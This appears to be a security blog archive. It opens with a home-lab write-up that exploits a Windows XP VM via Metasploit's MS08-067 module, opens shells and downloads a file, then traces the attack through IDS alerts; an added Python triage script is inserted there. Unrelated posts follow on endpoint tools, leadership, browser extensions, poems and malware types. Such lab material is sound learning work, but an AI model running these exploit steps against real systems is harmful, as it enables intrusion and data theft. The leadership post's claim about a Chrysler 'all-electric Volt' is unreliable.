Compromise, Detect, Respond – Project Kickoff – 001-01

I am sure that most of you have heard that in order to be good at any one specific security domain you need a solid understanding of the opposite domain as well. This is especially true between good and bad guys. You cannot be a great responder if you do not understand some of the basic techniques bad guys use to break into your environment. Similarly, in order to successfully penetrate and maintain persistence in your target environment you need to understand how forensicators track your movements.

Like many of you, I have heard this concept during many presentations and conferences. And like many of you I have wondered how I could best accomplish this myself. I, for one, am not an expert in any specific domain, so in order for me to catch up on the opposite domain I would actually have to do both sides, good and bad. And so with this exact idea in mind, I am kicking off what I hope is going to be a series of posts that will encompass the complete cycle: compromise -> detect -> respond (CDR).

Now, like I said in the beginning, I do not specialize in any particular domain, but what I am hoping to get out of this project is not just a better but a holistic understanding of the core domains that make up infosec. So with this in mind, here is my setup.

I have set up three different environments with the basic, free tools that will help me with each of the CDR stages:

Compromise – Metasploit, Armitage, Nessus, SET
Detect – EXE Radar Pro (trial), different A/Vs, Snorby IDS (Thanks to dfinf2 for showing me the ropes on setting this up initially. I had to re-purpose this, but down the road I plan to expand IDS capability.)
Respond – SIFT, Redline, Splunk

In addition to the above tool repository, each environment has a diverse group of vulnerable machines that will be used as targets.

The last thing I want to cover before the official kickoff is that during this whole process my goal will be to go through all three of the CDR stages as quickly as possible with the least amount of effort. The idea behind this is that in the real world there isn't a lot of time to get answers; typically you have a short period of time to get as much done as possible, so that is what I plan on doing with these exercises. In addition, I will not be documenting each of the steps that I take. There are more than enough online guides that walk you through, for example, how to use Metasploit against a specific target, so there isn't a point in duplicating that work. In fact, during these exercises I plan to use those same guides since I don't necessarily know how to use Metasploit myself :)

With that I think I have covered all the overview topics that I wanted to cover. But as environments, tools and other things change I will mention them in future posts. And now it's time to kick off our first CDR, and what better way to kick off than using XP as your target!

———————

case: 001-01

Target: WinXPProSP2 @ 10.0.0.15

Compromise

I started with a basic nmap reconnaissance scan to see what I had open on the target machine.

Nmap scan report for 10.0.0.15
Host is up (0.00040s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:91:68:A0
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop

The nmap report above shows only three TCP ports open on our target system, but it does confirm the OS of the system and the network connectivity. The next thing I did was spend some time searching online for XP Metasploit exploits that I could use in this exercise. In no time I had a few exploits that would give me remote access to the target system.

Here is the first one:

Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 0
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great

And now the payload – nothing like the VNC Inject for the first exercise!

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
payload => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set rhot 10.0.0.15
rhot => 10.0.0.15
msf exploit(ms08_067_netapi) > check
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.15
RHOST => 10.0.0.15
msf exploit(ms08_067_netapi) > check

[*] Verifying vulnerable status… (path: 0x0000005a)
[+] The target is vulnerable.
msf exploit(ms08_067_netapi) > exploit

And just like that we have a Metasploit shell (in blue) and we can remotely see the target system's desktop (the black command prompt window is on the target system).

MetasploitShell

Detection

At this point we have successfully compromised the target system (using probably one of the oldest exploits for XP, but we are just getting started!). But before we move forward with a little more compromise, let's check what, if anything, we have from the detection point of view after our first attack.

Here is what we see in the IDS so far:

IDS VNC Detection

Now, besides the fact that the IDS triggered on our first exploit, I am even happier to see that our IDS deployment is working overall!

Now let's look at some of the alert details. The first alert seems to indicate that a Metasploit reverse shell with executable code was detected. The other three alerts are related to a known critical buffer overflow vulnerability that exists in unpatched versions of Microsoft Windows.

Based on the above information, we have the basics to initiate the response stage. We know the malicious source IP as well as the IP of the impacted host in our environment. But before we move forward with the response, let's do a little more compromise and see whether our second attempt succeeds.

Compromise 2

In the second Compromise stage, we use the same exploit as in the first Compromise (ms08_067_netapi); however, our payload is now different.

msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp

payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 10.0.0.15
rhost => 10.0.0.15
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.15
[*] Command shell session 2 opened (10.0.0.23:59317 -> 10.0.0.15:4444) at 2014-06-22 17:49:04 -0400

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

As you will notice from the above, our payload was successfully delivered to the target system and in return gave us access to the target system's shell. Now to make this scenario more interesting, I created a text file on the Windows XP target machine and named it Important.txt in My Documents under the Administrator account. Now my goal will be to read the content of that file from my Metasploit system and possibly copy it out to my local hacking machine.

Accessing Important.txt File

In the screenshot above we are able to change directory from C:\WINDOWS\system32 to My Documents of the Administrator account and view the content of the Important.txt file.

So with the above, our first goal is completed: we have been able to read the content of the Important.txt file. Now the second goal was to copy the file out to our local Metasploit machine. For this we established another session with our target Windows machine, and instead of a Windows shell, this time we got a Meterpreter session from our payload.

Download Important.txt From Target To Local System

After the successful payload delivery, we ran the getpid command to see which process on the target machine we're bound to (this will be handy in the Response step). After that we changed directories to the Administrator user's documents and downloaded Important.txt successfully.

This concludes the Compromise 2 stage. At this time our target Windows XP system is severely owned! The IDS has now triggered a total of 12 alerts related to this event:

Total IDS Alerts

Now we will move towards the Response phase.

Response

We already know that our Windows XP machine is compromised, so we will proceed with collecting the memory of the system. In addition, we will run some Sysinternals tools to confirm the network communication to the malicious IP and determine the process that was involved in this communication…
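The Detection stage above reads the IDS alerts to get the malicious source IP and the impacted host, and the Response stage plans to use host-side tooling to find the process behind that communication. The following script is an added example (not code from the original post) that does both steps over constructed sample data: it parses Snort "fast"-format alert lines to pick out the most frequent source and destination, then parses `netstat -ano` and `tasklist /FO CSV` output from the impacted host to list which PIDs hold sockets to that peer. All sample lines, rule SIDs, PIDs and alert messages are made up for the demonstration; the only values borrowed from the post are the two lab IPs and the bind port 4444 shown in the Metasploit output.

```python
"""Tie IDS alerts to the process on the compromised host that owns the connection."""
import csv
import io
import re
from collections import Counter

# --- Constructed sample data; nothing here comes from the original post. ----
# Snort "fast"-format alert lines. SIDs 1000001-1000004 are in the local-rule
# range and the messages are made up for this example.
SAMPLE_ALERTS = """\
08/17-13:05:22.101 [**] [1:1000001:1] LOCAL MS08-067 Server Service path overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.23:41122 -> 10.0.0.15:445
08/17-13:05:22.340 [**] [1:1000002:1] LOCAL Metasploit encoded stage inbound [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 10.0.0.23:41122 -> 10.0.0.15:445
08/17-13:05:23.015 [**] [1:1000003:1] LOCAL Windows command shell banner outbound [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.0.15:4444 -> 10.0.0.23:59317
08/17-13:06:40.990 [**] [1:1000004:1] LOCAL NetBIOS name query [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 10.0.0.9:51000 -> 10.0.0.15:139
"""

# "netstat -ano" as run on the impacted XP host (constructed; PIDs are invented).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       896
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.0.0.15:445          10.0.0.23:41122        ESTABLISHED     4
  TCP    10.0.0.15:4444         10.0.0.23:59317        ESTABLISHED     1028
  UDP    0.0.0.0:445            *:*                                    4
"""

# "tasklist /FO CSV" from the same host (constructed).
SAMPLE_TASKLIST = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Console","0","236 K"
"svchost.exe","896","Console","0","4,212 K"
"svchost.exe","1028","Console","0","5,104 K"
"explorer.exe","1532","Console","0","18,440 K"
"""

ALERT_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\](?:\s+\[Classification:\s+(?P<cls>[^\]]+)\])?"
    r"\s+\[Priority:\s+(?P<prio>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$"
)
# Proto, local, foreign, optional state (UDP rows have none), PID.
NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")


def parse_alerts(text):
    """Return one dict per parseable alert line; non-alert lines are skipped."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line)
        if m:
            alerts.append(m.groupdict())
    return alerts


def identify_parties(alerts):
    """Most frequent source = suspected attacker; most frequent other destination = impacted host."""
    if not alerts:
        return None, None
    attacker = Counter(a["src"] for a in alerts).most_common(1)[0][0]
    dsts = Counter(a["dst"] for a in alerts).most_common()
    victim = next((ip for ip, _ in dsts if ip != attacker), None)
    return attacker, victim


def parse_netstat(text):
    """Parse 'netstat -ano' rows into dicts with split IP/port fields and an int PID."""
    conns = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        proto, local, foreign, state, pid = m.groups()
        lip, lport = local.rsplit(":", 1)
        fip, fport = foreign.rsplit(":", 1)
        conns.append({"proto": proto, "local_ip": lip, "local_port": lport,
                      "foreign_ip": fip, "foreign_port": fport,
                      "state": state or "", "pid": int(pid)})
    return conns


def parse_tasklist(text):
    """Map PID -> image name from 'tasklist /FO CSV' output."""
    return {int(r["PID"]): r["Image Name"] for r in csv.DictReader(io.StringIO(text))}


def processes_talking_to(conns, peer_ip, names):
    """Every socket whose foreign address is the peer, with the owning process named."""
    return [{"pid": c["pid"], "image": names.get(c["pid"], "?"),
             "local": f"{c['local_ip']}:{c['local_port']}",
             "remote": f"{c['foreign_ip']}:{c['foreign_port']}", "state": c["state"]}
            for c in conns if c["foreign_ip"] == peer_ip]


def triage(alert_text, netstat_text, tasklist_text):
    """IDS view (who attacked whom) joined with the host view (which PID holds the socket)."""
    alerts = parse_alerts(alert_text)
    attacker, victim = identify_parties(alerts)
    hits = processes_talking_to(parse_netstat(netstat_text), attacker, parse_tasklist(tasklist_text))
    return {"alert_count": len(alerts), "signatures": Counter(a["msg"] for a in alerts),
            "attacker": attacker, "victim": victim, "suspect_processes": hits}


if __name__ == "__main__":
    r = triage(SAMPLE_ALERTS, SAMPLE_NETSTAT, SAMPLE_TASKLIST)
    print(f"{r['alert_count']} alerts: {r['attacker']} -> {r['victim']}")
    for msg, n in r["signatures"].most_common():
        print(f"  {n}x {msg}")
    for p in r["suspect_processes"]:
        print(f"  PID {p['pid']:>5} {p['image']:<13} {p['local']} <-> {p['remote']} {p['state']}")
```

Run against the sample data it reports two sockets to the attacker: the SMB session on port 445 owned by PID 4 (System), which is what a normal file-sharing connection looks like, and the port 4444 socket owned by an svchost.exe instance, which is the one worth carving out of the memory image. Comparing that PID with the value returned by getpid in the Meterpreter session closes the loop between the attacker's view and the responder's view.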

Support For Your Anti-Virus

A few months ago I published two blog posts about having additional layers of security for your home computers. You can read them here: part 1 and part 2. The goal of those two posts was first to bring awareness, using my personal experience, of how we simply cannot rely on anti-virus software to protect our personal computers, and second to demonstrate how effective some free browser extensions are at preventing unwanted and potentially malicious programs from downloading in the background without much of our knowledge or interaction.

This post is not exactly a continuation of the other two, but it is definitely related. In the previous posts I focused on free extensions; in this post I want to talk about an application that is not free but is definitely worth looking into.

That application is EXE Radar Pro from the NoVirusThanks group (besides this particular software, this group has a bunch of free and extremely useful online utilities that I have been using for some time, and you should check those out too!). EXE Radar Pro costs $19.99, with the option to try it free for 30 days. They do a pretty straightforward job of explaining what the software does, so I won't waste time repeating what is already there. Instead I will briefly explain my experience with this software, both the pros and the cons.

First the pros: the software is easy to install and seems to get to work immediately. There isn't a lot of configuration or an overly complicated interface that you need to worry about; it simply sits in your Windows tray and all of the management is done by selecting the tray icon. One of the more specific things I like about this software is that I think it is the closest you can get to enterprise-level endpoint monitoring software for such a low price. The software tracks pretty much all the running system processes and their parent processes, and monitors new processes as they start. You also have the ability to tag processes on either a blacklist or a whitelist based on what you think should be allowed or blocked. The software prompts you when it thinks a suspicious/unknown process is trying to run. I believe some of the basic checks it does to tell a good process from a bad one are simply whether the process itself is digitally signed and whether the process is being started with any specific/unusual command-line arguments. In fact, it presents all this information in the prompt dialog:

EXE Radar Pro - Prompt Alert

From the dialog above you can simply choose to allow or block, or use the drop-down arrow to add the process to either the whitelist or the blacklist. While the above dialog box is well designed and self-explanatory, I also experienced some annoying cons with it. For example, when you are prompted with the dialog box you do not have the option to ignore it. You can move it around the screen to get it out of the way, but you have to make the decision to either allow or block. In addition, until you make your selection you will not be able to execute another process. For example, when the above prompt came up on my screen and I wanted to take the screenshot using the Microsoft built-in Snipping Tool, I was not able to, because the snipping application would not execute until I made my selection in the dialog box (I was able to do it using the keyboard Print Screen key).

The second major con that I experienced is that on each boot of the system there would be a half-dozen prompts that I had to go through before the system was fully up and functional. I understand that some learning is involved in the beginning for the software, but even after two weeks and several whitelistings I would still receive numerous prompts during startup. And as you can imagine, when you are trying to get something done quickly these prompts become irritating. In fact, one of the applications that EXE Radar Pro particularly did not like was Splunk. Well before I downloaded EXE Radar Pro, I had Splunk Free installed on the computer to do basic log analysis. But once I installed EXE Radar Pro I would constantly get prompts. Eventually I became irritated and ended up uninstalling Splunk from the system. In fact, even during the uninstall process of Splunk, I had to hit Allow at least 8 times before the uninstall completed.

Overall, EXE Radar Pro is good software for personal use because it provides that additional layer of protection and control around what runs on your system. I would say that while the interface is simple and self-explanatory, an average user may not appreciate the frequency of the prompts, the technical details and the decision making that would be required. On the other hand, if you like having such visibility and control of your system, then for $19.99 you cannot go wrong with this software!

Overcoming Leadership Challenges – Part 2 : Current Times

This is the second part. Read the first part here.

There are several successful leaders from recent times who practiced a Hannibal-like leadership style; A.P. Giannini is one of them, the man who created the largest bank in the United States, the Bank of America. Like Hannibal, Giannini started working at an early age and taught himself the ropes of the business. He believed in unconventional ways of running banks, such as making loans to immigrants when no one else did. In addition, he was also very innovative and quickly adapted to situations. For example, when fires from the destructive earthquake began to spread to cities, many banks kept their deposits in steel vaults for protection. However, anticipating the damage fire would do to steel, Giannini knew it would take weeks before they would be able to open the vaults. So unlike other bankers, Giannini decided to remove the gold and securities from his vaults beforehand and was immediately able to lend to thousands of people who had suffered from the earthquake. In addition, while other banks were struggling to open their vaults, Giannini learned the importance of banks having a geographical presence. This resulted in purchases of small banks in different states and made Bank of America the first bank to cross state lines. Lastly, like Hannibal, Giannini was not in it for the money; each year he paid himself only $50,000, and toward the end of his career, when he was awarded a $1.5 million bonus, he donated it to the University of California.

Throughout his lifetime, Hannibal had to make numerous difficult decisions in times of crisis and motivated soldiers to continue their support while together achieving a common goal. Likewise, Lee Iacocca is an inspiring individual who saved the desperate Chrysler Corporation. Before joining Chrysler in 1978, Iacocca was president of Ford Motor Company and developed popular models like the Mustang. However, the CEO of Ford did not like Iacocca and, despite all of Iacocca's accomplishments for the company, refused to make him CEO; shortly after that Iacocca was let go from Ford.

At the same time, Chrysler was facing a tremendous number of challenges and was quickly approaching a complete shutdown. Iacocca accepted Chrysler's offer of the CEO position and agreed not to take any compensation unless the company got back on its feet. Iacocca understood the severity of the situation; however, just as Hannibal was driven to destroy Rome, Iacocca ultimately wanted to prove Ford wrong for letting him go. To bring the company around, Iacocca had to persuade the federal government to lend money to Chrysler, arguing that the country could not afford for such a huge domestic auto manufacturer to fail. Congress agreed to loan Chrysler $1.5 billion on the condition that it would pay back $2 billion to the government on its own.

To bring change to the organization Iacocca had to make tough decisions; he had to persuade workers and gain their trust to accept layoffs and wage cuts to save the company. Iacocca decided to discontinue production of less popular models and introduced a new line of models, the same ones that had been rejected at Ford, which ultimately became Chrysler's most profitable lineup. Lastly, Iacocca went public to improve the company's reputation and was featured in a commercial with the slogan "The pride is back."

In the end, Chrysler regained its reputation and profits while paying back the government well ahead of schedule. This was all made possible because of Iacocca's Hannibal-like leadership style, in which he was driven by his mission and made others believe in his mission too.

In conclusion, Hannibal was a leader whose sole motivator was his mission and not personal gain of wealth, which I think played a major role in his success. He was a sharp thinker and was able to effectively bring unconventional ideas to life. In today's competitive business world, this "translates into doing what has never been done before in industries where giants like Rome already exist."

Moreover, I personally liked the comparison of Hannibal and Iacocca. The reason being that in the recent recession the American auto industry faced a similar situation where it had to convince the government that it was "too big to fail". Despite the scrutiny from the public, the auto industry was awarded bailout money. And fortunately, like before, it came back stronger and began paying the government back. In addition, Chrysler used the same comeback approach as in the 1980s, introducing new innovative models like the all-electric Volt and the "Imported from Detroit" slogan.

I think the example of Chrysler beautifully shows that despite the changing times, successful leadership styles are the same. Like Hannibal, current leaders need to demonstrate an "irresistible will, intense focus, and a disciplined approach" in order to be successful and lead.

Overcoming Leadership Challenges – Part 1 : In History

Not too long ago I had the opportunity to read: Forbes, Steve, and John Prevas. "Hannibal of Carthage." Power Ambition Glory: The Stunning Parallels Between Great Leaders of the Ancient World and Today — and the Lessons You Can Learn. New York: Crown Business, 2009. Based on this reading, I am writing posts on the lessons that we can learn from Hannibal's amazing leadership and also looking at some successful leaders from recent times who I believe practiced a Hannibal-like leadership style.


Whenever we remember a successful or an unsuccessful leader we tend to remember them for what they did. For example, we recognize Cyrus and Alexander for conquering and building empires. However, it is equally important to distinguish a leader by how he did things rather than just by what he did. Hannibal is one of those leaders in history who did the impossible: he led armies over mountains that no one thought could be crossed, and he went against a force that no one thought could be beaten. Hannibal was able to achieve such success by following the simple principles of staying focused, thinking ahead and managing details.

Hannibal was the son of Hamilcar, who was the army general of the ancient state of Carthage, located 300 miles from Rome. From the age of nine Hannibal accompanied his father in battles, and like his father he soon grew an eternal hatred for Rome. "I swear that so soon as age will permit…I will use fire and steel to arrest the destiny of Rome." Soon after his father's death Hannibal took command of the army and launched the mission to which he had been sworn.

One of the main reasons behind Hannibal's unconventional success was his strong focus on the mission and respect for his followers. From the beginning, Hannibal strongly believed that as a leader, if you provide enough motivation, discipline and means for excelling self-interest, you can get people to follow you to do anything. Like the other leaders of his time, Hannibal's leadership style was authoritative and precise; however, he understood the importance of getting constant feedback from those he commanded. He led by example and never asked his soldiers to do anything that he would not be willing to do himself. That is why a major portion of his leadership was around training and rewarding his soldiers, many of whom came from the lower classes of society. In addition, Hannibal possessed incredible self-control and lived modestly. He "put his mission over his personal comforts and resisted being corrupted by wealth and success."

Moreover, Hannibal was a leader who always thought ahead and projected outcomes. He was one of the few leaders who recognized the importance of having broader knowledge beyond just military and political affairs. Before leaving for the war, he surrounded himself with scholars and learned both Greek and Latin, for cultural and strategic advantages. Soon he realized that the war between Rome and Carthage was inevitable and decided to take the initiative, which led to the Second Punic War.

Hannibal won several notable battles in Italy; however, his greatest accomplishment was the crossing of the Alps, one of the most dangerous and treacherous mountain ranges, covered with constant snow and subject to unexpected weather conditions. Hannibal had 80,000 infantry, 12,000 cavalry, and 40 war elephants. During this journey they encountered several local tribes that attempted to initiate battles; however, despite suggestions from his officers, Hannibal refused to mobilize his soldiers. While some soldiers saw this as cowardly behavior on Hannibal's part, it is an example of the thinking-ahead quality that Hannibal possessed. In addition, this shows a great component of Hannibal's leadership: "understanding which battles are important to win and which would simply waste resources and deflect attention from the objectives."

Nevertheless, by the time they finished crossing the mountains Hannibal had lost several good soldiers, and the ones left were extremely tired and weak. Even though Hannibal was able to motivate his soldiers to keep moving by promising them "enough gold, silver, and slaves for a new start in life", he knew that he had a bigger problem to handle. Hannibal knew that he could not take his soldiers, with such a lack of energy, into a traditional battle and had to think strategically. In the first encounter with the Romans, Hannibal decided to attack in the dark early morning through freezing water, which seemed a suicidal tactic to his officers. However, Hannibal's plan involved an ambush from behind enemy lines that would surround the enemy soldiers when they retreated. Likewise, in another attack Hannibal positioned his soldiers in such a manner that the rising sun on the morning of the battle would blind the Romans and the dust raised by all the movement of men and animals would blow into the faces of the enemy as they advanced. Such great attention to detail greatly helped Hannibal win numerous battles and overcome obstacles. "Hannibal won his battles because he exploited every advantage that terrain, weather, and psychology could afford him."

LAYERED SECURITY FOR HOME USER – PART 2

This is the second part of my layered security for home users topic. Please read part 1 first to get the full background.

Recently my father purchased a new laptop for both personal and work use. And like many parents, he is decent when it comes to technology; he is able to perform many basic computer functions such as email, YouTube, Skype, social media and online searches. But when it comes to security, like many others he simply relies on the anti-virus software. I usually install the anti-virus software and configure scheduled scans for him, but this time he was away and had his computer set up by the store he purchased it from. The store tech support installed the Norton 360 suite. Now, even though I have my preferences when it comes to different anti-virus vendors, when it comes to layered security it does not matter.

My father used his new laptop for roughly two months before he had me look at it. At first glance the system looked fine; Norton 360 was not complaining about anything and the system performance was also fine. But when I opened the browsers (IE and Chrome) it was hard to locate the address bar, because the browser windows were covered with numerous advertising toolbars. Also, both browsers had a different home page, and the default search engines had changed as well. At this point I knew that some cleanup was needed.

I started with my go-to software: Malwarebytes. I used it to perform a full sweep of the system, and after 3 hours it came back with more than 200 findings. And when I looked at the scan logs I found something interesting. Besides a handful of malicious executables, everything else was categorized as PUPs, Potentially Unwanted Programs: a PUP "is a piece of software that is also downloaded when a user downloads a specific program or application."

I have previous experience responding to malicious activity generated by PUPs. Usually this came through an IDS alert when one of these PUPs beaconed out. But in this case, my father's system did not generate any IDS alerts, maybe because it had only been on the network for less than 3 hours. Regardless, I decided to remove all of the findings and then confirmed their removal with a subsequent scan.

And this is where the fun part begins. What do you do when you have cleaned up an infected system? Well, it's time to put a few protective measures in place. Most tech support personnel perform this step by simply selling and installing different anti-virus software. But this measure fails immediately because they do not take the time to understand how the system got infected in the first place and how the user uses his or her system.

In my father's case, the system got infected due to his careless behavior while surfing online; this usually happens when he is searching. He has a hard time differentiating between legitimate links and advertisements, and because of this he tends to click on popups. Now, in a perfect world you would do some security knowledge transfer and hope for a change in behavior. However, this is not that easy, so we have to complement it with something else. This is what has worked in my case: an ad blocker.

I installed the AdBlock browser extension for both IE and Chrome on my father's computer. This complemented activating the browsers' built-in popup blocking functionality. AdBlock "blocks banners, pop-ups and video ads – even on Facebook and YouTube", which is perfect for someone who surfs the web most of the time.

In addition to the ad blocker, I also installed the DoNotTrackMe extension. The reason for this was that even though AdBlock does a great job of blocking popups and other online advertisements, there is only so much it can do against today's smart advertisements. It is no surprise that online advertising these days is very targeted: your online browsing behavior is tracked, and based on this behavior you are presented with advertisements. This makes it extremely difficult to differentiate between legitimate search results and advertisements.

During the time that I monitored my father's machine (~3 weeks) with both of these extensions enabled, I noticed a significant decrease in the number of malware and PUPs installed on the system. In fact, during this time I ran 4 Malwarebytes scans and they came back with between 5 and 8 findings. Interestingly enough, by the end of my monitoring the AdBlock extension had blocked 6,370 ads and DoNotTrackMe had blocked 4,269 trackers.

In conclusion, layered security has proven to be effective in our enterprises, and now it's time that we take this idea and implement it on our home systems. The free browser extension solution that I present here is by no means complete or elaborate; however, in my test above it has proven to be effective in blocking drive-by downloads (at a basic level) at $0 cost!

Zotero Review

Browser extension: Zotero

The most difficult part of the research process is keeping track of all of your sources. The traditional methods have been to print all the pages that you visit, or to copy and paste the text from the web sources into a Word document. However, the problem with those methods is that not only are they troublesome, but the chance of misplacing them is also greater. Moreover, when you are done with your paper and you have to create citations for each of your sources one by one, it is not only time consuming but also increases the chance of human error.

Zotero is a free Mozilla Firefox add-on which makes it easy to organize your sources and searches. It does that by saving a snapshot of the pages and saving the links. The best feature of the add-on is that it automatically creates citations for your saved sources in both APA and MLA format. In addition, since it is fully compatible with both Microsoft Office and OpenOffice, you can directly copy your citations into those programs.

Another great feature that I like is that you are able to sync your files with Zotero's online server. This provides not only a sense of security that your files are backed up, but also the ability to view all your saved sources if you log in from another computer. In addition, Zotero allows you to share your sources with other people. For that, all you have to do is create a new group, place the files that you want to share in it and sync. You can send invitations to your group to as many people as you want, and they can all view and make changes to your documents. This makes group collaboration much easier.

Personally, I've just been introduced to Zotero and I love all the user-friendly features that it has to offer. Whenever I am surfing the internet and I come across any article or news item that I could use later, I simply open the Zotero add-on and save a snapshot. In addition, Zotero's highlight feature comes in very handy as well. It allows me to highlight text right in the snapshot so that when I come back to that article I know exactly why I saved it in the first place.

Zotero is still a project under development. It has a dedicated link on its home page which allows enthusiastic individuals to contribute their new ideas or make improvements. For new users, they have a great support page which comprehensively explains all the great features of Zotero.

The only thing that I am on the lookout for is Zotero coming to different browser platforms. Currently it is only supported by Mozilla Firefox, which holds a certain disadvantage against it. In addition, I have noticed on occasion that the sync feature takes longer than usual. This could be due to their storage or the format that they are using.

Overall, I think Zotero is a great free tool for everyone who wants to efficiently save time and sources. My favorite features of Zotero are highlight and share. I am sure that the few glitches that Zotero currently has will soon disappear.

Layered Security For Home User – Part 1

Most who work in information security are familiar with the term layered security (also known as layered defense), which in a nutshell means that you employ multiple solutions or components to protect your assets. This idea has been pushed at the enterprise level for years and has been significantly effective at deterring attacks. And with the latest advancements in end-point monitoring (EPM) solutions, enterprises now have the capability to both monitor and control what happens on all of the workstations in the environment.

But if you move away from enterprise security to securing the average home user, most users tend to rely solely on anti-virus solutions. Now, I am not going to get into the debate over how effective or ineffective anti-virus solutions are, but if you are interested in reading rants on this topic feel free to do so. However, what I will say is that just having anti-virus software (especially now) definitely does not meet the layered security concept.

So, how do we get layered security for home computers? Well, the market is not shy of a variety of solutions that promise to complement your existing anti-virus while providing you the benefit of added security. In my opinion some of these products can actually be beneficial, such as malware, spyware and email protection, but most of these features are already built into the latest anti-virus solutions; you may just not know it. So, the question still stands: how do we get layered security for home computers? Well, let me answer this by explaining a recent event where I had the opportunity to test a theory first hand….


Security Valentines


So for Valentines, I decided to create a Hashtag #SecurityValentines partly for some fun but also to get some ideas together for simple security messages.

Roses are red,
Violets are blue,
I’m sat here,
Waiting to help you.

Roses are red
Violets are blue
All my base
Are belong to you

Snort is good
Kali is better
Get that signature
On the authorising letter

I hacked in
Found the data
I’m zipping it up
To exfiltrate later

Talk to me
I’m a Social Engineer
I won’t use your password
There’s nothing to fear (honest!)

I really regret
The hacker I dated
Get me a WAF
I’ve been penetrated. (Source David Powell)

I’m a virus
I’m here to destroy
There’s also a backdoor
That was my ploy

Give me your money
Ransomware is here
I’ll give you your data
After I’ve had this beer

Roses are red
Your password was weak


Traditional Threats

Below is my take on the common threats against our systems:

In today’s technological environment, risks to computer information are everywhere. These risks start when you power on your system and save any information on it. However, they grow exponentially when you connect your system to a network and access the internet.

Information security is the process of implementing the necessary measures not only to protect the physical environment but also to prevent modification, deletion and unauthorized access to information.

The need for information security is more vital than ever. The number of incidents involving information breaches has dramatically increased in the last few years. Most of these computer attacks exploit confidential information from companies’ networks (Tarte). Experts believe that the reason behind this increase is open vulnerabilities in corporate networks. Attackers are able to easily abuse these weaknesses and gain access to confidential information. However, attacks have also grown more sophisticated than ever. In most cases, victims do not realize that they are under attack until it is too late. It’s hard to believe, but attackers are able to remain “inside a compromised organization for months, gathering information with which they design and build even more sophisticated attacks” (Neal).

In addition, these cyber attacks are aimed not only at governments and major corporate networks but also at average consumers. A study conducted by Symantec shows that “65% of people globally have experienced some type of cybercrime” (Schwartz). Almost half of these incidents were caused by viruses and malware, while others were caused by phishing and social networking attacks (Schwartz). Moreover, the most common threat to today’s systems is malicious code. This category of software threat includes viruses, Trojan horses, logic bombs and worms.

Malicious code is a threat defined as performing unlawful, undesired functions that allow unauthorized access to confidential information. Such code is capable of bypassing security software and destroying the system. It is very important that the necessary steps are taken to protect systems against malicious code. However, it is vital that we first differentiate among the various kinds of malicious code (Computer virus: the types of viruses out there).

Viruses are the most common type of malicious code. This software enters the system in one of the following ways: through email, peer-to-peer sites or infected removable media, such as flash drives. In some cases viruses simply reside on the victim’s system; however, usually viruses are designed to destroy the data and operating system as well as spread to other systems. Upon infection, viruses usually take complete control of the system, flashing annoying pop-ups and denying users full access. However, in rare cases viruses hide their presence from the user. In both cases, the system significantly slows down and free disk space rapidly decreases. In severe instances, the system could mysteriously shut itself down and/or fail to reboot, with a BSOD (Blue Screen of Death) error (Dulaney).

Moreover, viruses are programmed to carry out two terrible tasks: bring your system to a halt, where it is no longer usable, or use your system as a means to spread to other systems. Upon infecting a system, a virus attaches itself to all the data and system files on that particular computer. This makes it easy for the virus to spread to other systems. The most common method of spreading is through flash drives; however, more sophisticated viruses can attach themselves to emails without the user’s awareness.

Unlike before, the security administrators of today are faced with the difficulty of identifying the exact type and characteristics of a certain virus before taking the necessary removal actions. The following are the most common and challenging virus types. An armored virus is programmed to hide itself from any anti-virus software. It does that by having a second set of code, or decoy code, which protects the actual code from detection. A companion virus works similarly to an armored virus in the sense that it hides itself from detection; however, it accomplishes this by associating itself as an extension to a legitimate application. When the user opens that application, the companion virus executes instead of the actual application. This type of virus is often used to corrupt Windows systems by manipulating the Registry (Computer virus: the types of viruses out there).

